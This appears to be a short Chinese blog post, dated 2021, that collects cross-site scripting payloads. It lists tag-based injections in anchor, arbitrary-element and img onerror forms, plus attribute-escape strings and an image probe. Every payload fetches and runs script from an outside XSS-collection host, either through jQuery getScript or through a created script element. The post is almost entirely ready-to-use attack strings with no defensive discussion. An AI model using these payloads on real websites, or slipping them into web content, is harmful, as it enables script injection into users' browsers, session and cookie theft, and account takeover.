xss 小总结 payload

发布于 2021-03-12  65 次阅读


标签集合

A标签 依赖于jquery

<a onmouseover="$.getScript`//xss.xss/meFEo1`">xxs link</a>

任意标签 依赖于jquery

<xxx tabindex=1  onfocus=$.getScript`//xss.xss/meFEo1`  autofocus></xxx>

图片标签 原生

<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//xss.xss/meFEo1';>

图片标签 依赖于jquery

<img src="x" onerror=s=$.getScript`XSS地址`>

标签逃逸

编辑框逃逸 依赖于jquery

onfocus=$.getScript`//xss.xss/meFEo1`  autofocus

img逃逸 原生

x" onerror=s=createElement('script');body.appendChild(s);s.src='XSS地址';"

img逃逸 依赖于jquery

x" onerror=s=$.getScript`xss地址`;"

探测

图片探针

<Img sRC=https://xss.xss/meFEo1/picc.jpg>

侠之大者,为国为民,侠之小者,为友为邻